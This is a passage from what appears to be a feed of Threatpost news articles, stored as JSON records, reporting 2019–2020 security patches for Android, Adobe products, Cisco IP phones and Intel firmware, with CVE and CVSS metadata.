That DoS flaw, CVE-2019-2232, has been addressed for devices running on versions 8.0, 8.1, 9 and 10 of the Android operating system, Google said.\n\nThe other two critical flaws (CVE-2019-2222 and CVE-2019-2223) exist in Android\u2019s Media framework. This framework includes support for playing a variety of common media types, so that users can easily utilize audio, video and images. These two bugs, which could enable a remote attacker using a crafted file to execute code within the context of a privileged process, have been addressed for Android devices running operating system versions 8.0, 8.1, 9 and 10.\n\nAlso fixed were three high-severity elevation-of-privilege flaws (CVE-2019-9464, CVE-2019-2217 and CVE-2019-2218) as well as a high-severity information disclosure glitch (CVE-2019-2220) in the Android framework. And, seven high-severity flaws \u2013 including remote-code-execution, elevation-of-privilege and information-disclosure vulnerabilities \u2013 were discovered in the Android operating system.\n\nMeanwhile, 22 CVEs \u2013 including three critical buffer overflow flaws \u2013 were also patched, related to Qualcomm closed-source components, which are used in Android devices. The [critical severity flaws](<https://www.qualcomm.com/company/product-security/bulletins/december-2019-bulletin>) exist across various Qualcomm technologies, including the multi-mode call processor (CVE-2019-10500), Wideband Code Division Multiple Access, an alternative to 2G/3G technology developed by Qualcomm, (CVE-2019-10525) and a modem (CVE-2019-2242). 
Finally, Google issued fixes for various other third-party components in its Android ecosystem, including a high-severity elevation-of-privilege vulnerability (CVE-2018-20961) in the USB MIDI class function driver used in Android\u2019s kernel component.\n\nThere are no current reports of these vulnerabilities being exploited in the wild.\n\n## Manufacturer Updates\n\nManufacturers of Android devices typically push out their own patches to address updates in tandem with or after the Google Security Bulletin.\n\nSamsung said in a [December security maintenance release](<https://security.samsungmobile.com/securityUpdate.smsb>) that it is releasing several of the Android security bulletin patches, including those addressing critical flaws, CVE-2019-2232, CVE-2019-2222 and CVE-2019-2223, to major Samsung models. Meanwhile LG [also rolled out patches](<https://lgsecurity.lge.com/>) covered by the December security bulletin (also addressing the three critical Android flaws as well).\n\nA [bulletin said](<https://source.android.com/security/bulletin/pixel>) a security update for Pixel devices, which run on Google\u2019s Android operating system, is \u201ccoming soon.\u201d Threatpost has reached out to Google for more details around this timeline.\n\nGoogle\u2019s update comes as out-of-date Android devices continue to face threats, including a new [Android vulnerability disclosed this week](<https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/>), called \u201cStrandHogg,\u201d which could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages.\n\nIn a security notice, the Multi-State Information Sharing and Analysis Center urged Android users to \u201cApply appropriate updates by Google Android or mobile carriers to vulnerable systems, immediately after appropriate testing\u201d in accordance with the security 
update bulletin.\n", "cvss3": {}, "published": "2019-12-03T17:18:47", "type": "threatpost", "title": "Critical Android Flaw Leads to 'Permanent DoS\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-20961", "CVE-2019-10500", "CVE-2019-10525", "CVE-2019-2217", "CVE-2019-2218", "CVE-2019-2220", "CVE-2019-2222", "CVE-2019-2223", "CVE-2019-2232", "CVE-2019-2242", "CVE-2019-9464", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-12-03T17:18:47", "id": "THREATPOST:9E04149817EE094AADC1268A47208E10", "href": "https://threatpost.com/google-critical-android-permanent-dos-flaw/150764/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:26:39", "description": "Adobe Systems is warning Illustrator 2019 users that two critical memory-corruption vulnerabilities could allow for an attacker to remotely connect to a Windows machine, execute code and gain control of the targeted system.\n\nThe create-suite behemoth also warned Tuesday, as part of its [regular monthly patch advisories](<https://blogs.adobe.com/psirt/?p=1801>), that its Windows and macOS versions of its Adobe Media Encoder also have a critical vulnerability tied to an out-of-bounds write flaw.\n\nAdobe said none of the critical bugs, nor an additional eight vulnerabilities rated important and identified Tuesday, have been exploited in the wild.\n\n**Adobe Illustrator 2019**\n\nThree security updates available for Adobe Illustrator 2019 affect Windows version 23.1 and earlier. The most serious of the bugs ([CVE-2019-8247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8247>), [CVE-2019-8248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8248>)) are both remote code execution flaws. Adobe did not go into technical detail of either bug. 
Mitigation includes updating to the latest version (24.0) of the software, according to the bulletin.\n\nLike both critical bugs, the additional important Illustrator vulnerability ([CVE-2019-7962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7962>)) is also found in the Windows 23.1 and earlier versions of the software.\n\nKushal Arvind Shah of Fortinet\u2019s FortiGuard Labs is credited for finding both the critical bugs.\n\n**Adobe Media Encoder**\n\nThe free application Adobe Media Encoder, used with Adobe Premiere Pro and Adobe After Effects to transcode video suitable for the web, also received a critical fix ([CVE-2019-8246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8246>)). Affected was the 13.1 version of the software compatible with both the Windows and macOS operating systems.\n\nThe fixes for the additional important Media Encoder bugs ([CVE-2019-8241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8241>), [CVE-2019-8242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8242>), [CVE-2019-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8243>), [CVE-2019-8244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8244>)) resolve multiple file parsing vulnerabilities. Successful exploitation could lead to information disclosure in the context of the current user, according to Adobe.\n\nWen Guang Jiao of Qihoo 360 Core Security is credited for finding the critical RCE bug. Adobe is urging customers to upgrade to the 14.0 version of the software.\n\n**Adobe Bridge and Animate**\n\nAdobe Bridge also received a number of important updates ([CVE-2019-8239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8239>), [CVE-2019-8240](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8240>)), impacting both the Windows and macOS 9.1 versions of the software. 
Mitigation includes updating to the 10.0 version of Adobe Bridge.\n\n\u201cThis update addresses multiple vulnerabilities rated important that occur when parsing malformed SVG images. Successful exploitation could lead to information disclosure in the context of the current user,\u201d wrote Adobe.\n\nAdobe is also warning that its Animate (version 19.2.1) software for Windows is also vulnerable to a security flaw rated important. The bug ([CVE-2019-7960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7960>)) is an \u201cinsecure library loading vulnerability that could lead to privilege escalation,\u201d according to the company.\n\nResearcher Youngjun Liu of Nsfocus is credited for discovering and reporting the Animate bug.\n\n**Insecure Defaults in Adobe\u2019s Mobile SDKs**\n\nThe Tuesday Adobe security bulletin [did not address an insecure defaults issue](<https://wwws.nightwatchcybersecurity.com/2019/11/06/insecure-defaults-in-adobes-mobile-sdks/>) with its mobile SDKs found last week by researchers behind the Nightwatch Cybersecurity blog. That Adobe issue was addressed last week with the company stating:\n\n\u201cAdobe worked with the researcher who brought this matter to our attention to remediate the findings. Adobe released new versions of the mobile SDKs, which can be found here: <https://github.com/Adobe-Marketing-Cloud/acp-sdks>. The SDKs are configurable in Adobe Experience Platform Launch and require SSL for data transmission.\u201d\n\nNightwatch Cybersecurity had found that some default configuration files, provided by Adobe within its mobile SDKs, include several insecure options. If developers failed to change those default configuration options, then the corresponding live code could also be insecure.\n", "cvss3": {}, "published": "2019-11-12T18:10:18", "type": "threatpost", "title": "Adobe Patches Critical Bugs in Illustrator, Media Encoder", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-7960", "CVE-2019-7962", "CVE-2019-8239", "CVE-2019-8240", "CVE-2019-8241", "CVE-2019-8242", "CVE-2019-8243", "CVE-2019-8244", "CVE-2019-8246", "CVE-2019-8247", "CVE-2019-8248", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-12T18:10:18", "id": "THREATPOST:15D2E9F142FD01B0FB329D7E3179F0E4", "href": "https://threatpost.com/adobe-critical-bugs-illustrator-media-encoder/150114/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:26", "description": "Adobe released a slew of patches for critical vulnerabilities Tuesday that were part of an out-of-band security update. Several of the critical flaws are tied to Adobe\u2019s popular Photoshop photo-editing software and allow adversaries to execute arbitrary code on targeted Windows devices.\n\nOverall, Adobe issued patches for flaws tied to 12 CVEs across Bridge, Prelude and Photoshop applications. The unscheduled updates come a week after Adobe issued its [official July 2020 security updates](<https://threatpost.com/adobe-critical-code-execution-bugs-july/157420/>), including critical code-execution bugs.\n\nAdobe said it was not aware of any exploits in the wild for any of the bugs patched in the update. 
The company did not offer technical details regarding the Photoshop CVEs.\n\nThreatpost reached out to Mat Powell, researcher with Trend Micro\u2019s Zero Day Initiative, who is credited for finding each of the critical flaws. Powell has not responded to that request. Threatpost hopes to update this report with additional commentary from the researcher.\n\nAll of the reported critical flaws stem from out-of-bounds read and write vulnerabilities, which occur when the software reads data past the end of \u2013 or before the beginning of \u2013 the intended buffer, potentially resulting in corruption of sensitive information, a crash, or code execution among other things.\n\n[Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb20-45.html>) features two out-of-bounds read flaws (CVE-2020-9683, CVE-2020-9686) and three out-of-bounds write (CVE-2020-9684, CVE-2020-9685, CVE-2020-9687) issues. All of these could \u201clead to arbitrary code execution in the context of the current user,\u201d according to Adobe.\n\nThe Photoshop vulnerabilities affect Photoshop CC 2019 versions 20.0.9 and earlier and Photoshop 2020 21.2 and earlier (for Windows). Users can update to versions 20.0.10 and 21.2.1, respectively.\n\nAdobe has previously addressed various serious flaws in its Photoshop photo editing app, including [dozens of arbitrary code-execution issues](<https://threatpost.com/critical-adobe-photoshop-acrobat-reader-flaws/153902/>) in March \u2013 which addressed 22 CVEs in Photoshop overall, 16 of which were critical.\n\n## **Other Flaws**\n\nAlso fixed were [critical flaws tied to three CVEs in Bridge](<https://helpx.adobe.com/security/products/bridge/apsb20-44.html>), Adobe\u2019s asset management app. These include an out-of-bounds read flaw (CVE-2020-9675) and out-of-bounds write issues (CVE-2020-9674, CVE-2020-9676) that could enable code execution. 
Adobe Bridge versions 10.0.3 and earlier are affected; users can update to version 10.1.1 for a fix.\n\nAdobe also issued patches for critical vulnerabilities [in its Prelude app](<https://helpx.adobe.com/security/products/prelude/apsb20-46.html>), which works with its Premiere Pro video editing app to allow users to tag media with metadata for searching, post-production workflows, and footage lifecycle management.\n\nPrelude contains out-of-bounds read (CVE-2020-9677, CVE-2020-9679) and out-of-bounds write (CVE-2020-9678, CVE-2020-9680) glitches that can allow code execution. Adobe Prelude versions 9.0 and earlier for Windows are affected; users can update to version 9.0.1.\n\nPowell was also credited with reporting the additional critical flaws.\n\nAdobe also issued patches for [an \u201cimportant\u201d severity flaw](<https://helpx.adobe.com/security/products/reader-mobile/apsb20-50.html>) in Adobe Reader Mobile for Android, which allows users to view and edit PDFs from their smartphones. The application has a directory traversal issue (CVE-2020-9663) enabling information disclosure in the context of the current user. Adobe Reader Mobile for Android, versions 20.0.1 and earlier, is impacted. 
Users can update to version 20.3 (for all Android versions).\n", "cvss3": {}, "published": "2020-07-21T15:06:50", "type": "threatpost", "title": "Critical Adobe Photoshop Flaws Patched in Emergency Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9663", "CVE-2020-9674", "CVE-2020-9675", "CVE-2020-9676", "CVE-2020-9677", "CVE-2020-9678", "CVE-2020-9679", "CVE-2020-9680", "CVE-2020-9683", "CVE-2020-9684", "CVE-2020-9685", "CVE-2020-9686", "CVE-2020-9687"], "modified": "2020-07-21T15:06:50", "id": "THREATPOST:935FDBA342DDD020D66B791DBE0AEA4D", "href": "https://threatpost.com/critical-adobe-photoshop-flaws-patched-in-emergency-update/157581/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:47", "description": "Adobe has released its scheduled July 2020 security updates, covering flaws in five different product areas: Creative Cloud Desktop; Media Encoder; Download Manager; Genuine Service; and ColdFusion.\n\nFour of the bugs are rated critical in severity, with the others ranked as important. Most of the important flaws involve privilege escalation, with the critical bugs opening the door to more dangerous attacks.\n\n\u201cUpdates to both Adobe Download Manager and Media Encoder address critical vulnerabilities (CVE-2020-9688, 9646, and 9650) that could lead to arbitrary code execution,\u201d Justin Knapp, product marketing manager at Automox, told Threatpost. 
\u201cThe fourth critical vulnerability (CVE-2020-9682) impacts Creative Cloud Desktop, and if exploited, could allow an attacker to create or modify files.\u201d\n\n**Creative Cloud Desktop**\n\nAdobe has [released patches](<https://helpx.adobe.com/security/products/creative-cloud/apsb20-33.html>) for four different flaws in its Creative Cloud Desktop Application for Windows, including a critical flaw allowing arbitrary file system writes.\n\nCreative Cloud is a suite of apps and services for creating and processing video, design, photography and web art. Affected versions of the product include Creative Cloud Desktop Application 5.1 and earlier, Adobe noted in its scheduled monthly security update on Tuesday.\n\nThe critical flaw is a symbolic link (symlink) vulnerability (CVE-2020-9682) that could allow an attacker with a successful exploit to create or modify a file in a location they could not normally access. Symlinks are shortcuts to other files.\n\n\u201cWhile this is a critical vulnerability, Adobe has ranked it a 2, which means these systems could be at an increased risk based on past history, then again for this particular vulnerability there are no current known exploits,\u201d said Jimmy Graham, senior director of product management, after reviewing the advisory.\n\nThe patches also address three important-rated security bugs, all of which could lead to privilege escalation in the context of the current user. 
The bug tracked as CVE-2020-9669 stems from a lack of exploit mitigations; CVE-2020-9671 stems from insecure file permissions; and CVE-2020-9670 is another, less severe symlink vulnerability.\n\nAcknowledgements for finding the flaws went to Xavier Danest of Decathlon (CVE-2020-9671); and Zhongcheng Li of Topsec Alpha Team (CVE-2020-9669, CVE-2020-9670 and CVE-2020-9682).\n\n**Media Encoder**\n\nAdobe also released [an update](<https://helpx.adobe.com/security/products/media-encoder/apsb20-36.html>) for Adobe Media Encoder for Windows, 14.2 and earlier versions. Media Encoder is part of Adobe\u2019s video-editing suite and is responsible for converting video files to the proper format to ensure they play well on different kinds of devices.\n\nThe advisory addresses two critical out-of-bounds write bugs (CVE-2020-9650 and CVE-2020-9646) that could lead to arbitrary code execution; and an important out-of-bounds read (CVE-2020-9649) that could allow information disclosure in the context of the current user.\n\n\u201cOn their own, arbitrary code-execution exploits are limited in scope to the privilege of the affected process, but when combined with privilege escalation vulnerabilities they can allow an attacker to quickly escalate a process\u2019s privileges and execute code on the target system, giving the attacker full control over the device,\u201d Knapp said.\n\nAdobe credited the Trend Micro Zero Day Initiative for reporting the issues.\n\n**Download Manager**\n\nAlso among the security fixes is [a patch](<https://helpx.adobe.com/security/products/adm/apsb20-49.html>) for a critical vulnerability that could lead to arbitrary code-execution in Adobe Download Manager for Windows. 
The bug (CVE-2020-9688) affects version 2.0.0.518 of the platform.\n\nThe issue allows for command injection if exploited, which could ultimately open the door to arbitrary code-execution.\n\nSecurity researcher Dhiraj Mishra (@RandomDhiraj) reported the issue.\n\n**Genuine Service**\n\nMeanwhile, the Adobe Genuine Service for Windows and macOS, which periodically validates already-installed Adobe software to root out incorrect or invalid licenses and pirated software, has three important vulnerabilities.\n\nThese could all lead to privilege escalation in the context of the current user. They include two insecure library-loading bugs (CVE-2020-9667 and CVE-2020-9681) and one that results from the mishandling of symlinks (CVE-2020-9668).\n\nThey affect Genuine Service versions 6.6 and earlier, according to [Adobe\u2019s update](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>).\n\nAdobe credited Adrian Denkiewicz from CQURE (CVE-2020-9667) and Topsec Alpha Team\u2019s Li (CVE-2020-9668, CVE-2020-9681) for the finds.\n\n**Adobe ColdFusion**\n\nAnd finally, Adobe [also released](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>) patches for multiple important vulnerabilities in ColdFusion versions 2016 (Update 15 and earlier) and 2018 (Update 9 and earlier). ColdFusion is the vendor\u2019s popular platform for building and deploying web and mobile applications.\n\nTwo CVEs cover flaws allowing DLL search-order hijacking, leading to privilege escalation (CVE-2020-9672 and CVE-2020-9673). 
The bugs were reported by Nuttakorn Tungpoonsup and Ammarit Thongthua of the Secure D Center Research Team, along with Sittikorn Sangrattanapitak, an independent cybersecurity researcher.\n\nThe July patch update is light compared to [Adobe\u2019s usual slew of monthly security fixes](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>), but that may be because the company issued an out-of-band update for 18 critical vulnerabilities in mid-June. These impacted a [raft of key products](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>), including Adobe After Effects, Illustrator, Premiere Pro, Premiere Rush and Audition. With successful exploits, the flaws would allow attackers to execute arbitrary code.\n\n\u201cThe Adobe bulletin list for this month is pretty light and none of the more high-profile targets are included,\u201d Chris Goettl, director of product management for security at Ivanti, told Threatpost. \u201cFlash player has a release as well, but it is not security-related. Adobe Acrobat and Reader were updated in May so it is likely we will see them due for some attention in the August patch cycle.\u201d\n\nAs for July\u2019s updates, administrators should nonetheless prioritize applying the patches ASAP, Knapp said.\n\n\u201cWith the average organization taking 107 days to patch a new vulnerability, it is likely that there are now many organizations with both arbitrary code-execution and privilege-escalation vulnerabilities present on corporate devices that could create a perfect storm for attackers to exploit,\u201d he told Threatpost.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. 
ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://helpx.adobe.com/security/products/integrity_service/apsb20-42.html>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-14T17:02:03", "type": "threatpost", "title": "Adobe Discloses Critical Code-Execution Bugs in July Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9646", "CVE-2020-9649", "CVE-2020-9650", "CVE-2020-9667", "CVE-2020-9668", "CVE-2020-9669", "CVE-2020-9670", "CVE-2020-9671", "CVE-2020-9672", "CVE-2020-9673", "CVE-2020-9681", "CVE-2020-9682", "CVE-2020-9688"], "modified": "2020-07-14T17:02:03", "id": "THREATPOST:C22F1F8B7AB3041436E903528767C174", "href": "https://threatpost.com/adobe-critical-code-execution-bugs-july/157420/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:15", "description": "Cisco is warning of a critical flaw in the web server of its IP phones. If exploited, the flaw could allow an unauthenticated, remote attacker to execute code with root privileges or launch a denial-of-service (DoS) attack.\n\nProof-of-concept (PoC) exploit code has been posted [on GitHub](<https://github.com/tenable/poc/blob/master/cisco/ip_phone/cve_2020_3161.txt>) for the vulnerability ([CVE-2020-3161](<https://nvd.nist.gov/vuln/detail/CVE-2020-3161>)), which ranks 9.8 out of 10 on the CVSS scale. 
Cisco issued patches in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) for the flaw, which affects various versions of its Cisco IP phones for small- to medium-sized businesses.\n\nAccording to Jacob Baines with Tenable, [who discovered the flaw](<https://www.tenable.com/security/research/tra-2020-24>), Cisco IP phone web servers lack proper input validation for HTTP requests. To exploit the bug, an attacker could merely send a crafted HTTP request to the /deviceconfig/setActivationCode endpoint (on the web server of the targeted device).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis triggers a stack-based buffer overflow due to the lack of input validation: \u201cIn libHTTPService.so, the parameters after /deviceconfig/setActivationCode are used to create a new URI via a sprintf function call. The length of the parameter string is not checked,\u201d according to Baines.\n\nThe end result is the attacker being able to crash the device, or even potentially execute code remotely.\n\nAffected products include: IP Phone 7811, 7821, 7841, and 7861 Desktop Phones; IP Phone 8811, 8841, 8845, 8851, 8861, and 8865 Desktop Phones; Unified IP Conference Phone 8831 and Wireless IP Phone 8821 and 8821-EX.\n\nOf note, according to Cisco, [some of these products](<https://www.cisco.com/c/en/us/products/collaboration-endpoints/wireless-ip-phone-8821/index.html>) (particularly the Wireless IP Phone 8821 and 8821-EX) are utilized by the healthcare industry, which is currently on the front lines of the [coronavirus pandemic.](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132716/cisco-critical-flaw-1.png>)\n\nCisco has also confirmed various products that aren\u2019t affected by the flaw[ on its 
website.](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) Beyond Cisco\u2019s patches, one mitigation for the flaw is disabling web access on the IP phones (in fact, web access is disabled by default on IP phones), according to Cisco.\n\nNew findings by Tenable\u2019s Baines also led Cisco to bump up the severity of a previously discovered vulnerability (CVE-2016-1421) in its IP phones to critical on Wednesday. Previously the flaw was medium-severity ([ranking 5 out of 10](<https://www.cvedetails.com/cve/CVE-2016-1421/>) on the CVSS scale).\n\nHowever, Baines found that the flaw could be exploited by an unauthenticated actor (previously Cisco said exploiting the flaw required authentication) and could potentially enable remote code execution as well as DoS (previously Cisco found it could only enable DoS). Baines also found that a product not on the affected list, the Wireless IP Phone 8821, is vulnerable.\n\n**Other Critical Flaws**\n\nCisco [Wednesday also addressed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsd-mult-vulns-UNfpdW4E>) critical- and high-severity flaws tied to nine CVEs in its Cisco Unified Computing System (UCS) Director and Cisco UCS Director Express for Big Data. Cisco UCS Director is an end-to-end management platform for various Cisco and non-Cisco data infrastructure components. Cisco UCS Director Express for Big Data is an open private-cloud platform that delivers Big-Data-as-a-Service on premises.\n\nThe flaws (CVE-2020-3239, CVE-2020-3240, CVE-2020-3243, CVE-2020-3247, CVE-2020-3248, CVE-2020-3249, CVE-2020-3250, CVE-2020-3251, CVE-2020-3252) exist in the REST API for both products, and may allow a remote attacker to bypass authentication or conduct directory traversal attacks on an affected device. 
Below is a list of affected products and the fixed releases.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132738/cisco-critical-flaw-2.png>)\n\nSteven Seeley of Source Incite, working with Trend Micro\u2019s Zero Day Initiative, was credited with reporting the flaws.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory,\u201d according to Cisco.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-16T18:49:27", "type": "threatpost", "title": "Cisco IP Phone Harbors Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1421", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3161", "CVE-2020-3239", "CVE-2020-3240", "CVE-2020-3243", "CVE-2020-3247", "CVE-2020-3248", "CVE-2020-3249", "CVE-2020-3250", "CVE-2020-3251", "CVE-2020-3252", "CVE-2020-5135"], "modified": "2020-04-16T18:49:27", "id": "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "href": "https://threatpost.com/critical-cisco-ip-phone-rce-flaw/154864/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:38", "description": "Intel has released its June security updates, which address two critical vulnerabilities that, if exploited, can give unauthenticated attackers elevated 
privileges.\n\nThe critical flaws exist in [Intel\u2019s Active Management Technology](<https://threatpost.com/intel-amt-loophole-allows-hackers-to-gain-control-of-some-pcs-in-under-a-minute/129408/>) (AMT), which is used for remote out-of-band management of personal computers.\n\nThe two critical flaws ([CVE-2020-0594](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0594>) and [CVE-2020-0595](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0595>)) exist in the IPv6 subsystem of AMT (and Intel\u2019s Standard Manageability solution, which serves a similar function to AMT). The flaws could potentially enable an unauthenticated user to gain elevated privileges via network access. AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 are affected.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCVE-2020-0594 is an out-of-bounds read flaw while CVE-2020-0595 is a use-after-free vulnerability. Both flaws rank 9.8 out of 10.0 on the CVSS scale, making them critical.\n\nA high-severity privilege escalation flaw, existing in the Intel Innovation Engine, was also patched. Innovation Engine is an embedded core in the Peripheral Controller Hub (PCH), a dedicated subsystem that system vendors can use to customize their firmware.\n\nThe flaw ([CVE-2020-8675](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8675>)) stems from insufficient control flow management in the Innovation Engine\u2019s firmware build and signing tool before version 1.0.859, and may allow an unauthenticated user to potentially enable escalation of privilege via physical access.\n\nA flaw was also fixed in Intel\u2019s Solid State Drive (SSD) products, which could allow information disclosure. 
The flaw ([CVE-2020-0527](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0527>)) stems from insufficient control flow management in firmware for some Intel Data Center SSDs (a list of affected products [can be found here](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00266.html>)).\n\nThe flaw \u201cmay allow a privileged user to potentially enable information disclosure via local access,\u201d according to Intel.\n\nIntel also fixed flaws in the [BIOS firmware](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00322.html>) for some Intel processors, which may enable escalation of privilege or denial of service (DoS). That includes a high-severity flaw ([CVE-2020-0528](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0528>)) stemming from improper buffer restrictions in the BIOS firmware for 7th, 8th, 9th and 10th Generation Intel Core processor families. In order to exploit this flaw, an attacker would need to be authenticated (for privilege escalation) and have local access (for DoS).\n\n\u201cIntel recommends that users update to the latest firmware version provided by the system manufacturer that addresses this issue,\u201d according to the [chip giant\u2019s advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00366.html>).\n\nIntel [also fixed an array](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00295.html>) of high-severity flaws (including [CVE-2020-0586](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0586>), [CVE-2020-0542](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0542>), [CVE-2020-0596](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0596>), [CVE-2020-0538](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0538>), [CVE-2020-0534](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0534>), [CVE-2020-0533](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0533>), 
[CVE-2020-0566](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0566>) and [CVE-2020-0532](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0532>)) across its Converged Security and Manageability Engine (CSME), Server Platform Services (SPS), Trusted Execution Engine (TXE) and Dynamic Application Loader (DAL) products.\n\n## **CrossTalk Flaw**\n\nOne [medium-severity flaw](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00320.html>) disclosed Tuesday by Intel ([CVE-2020-0543](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0543>)) was called \u201cCrossTalk\u201d by security researche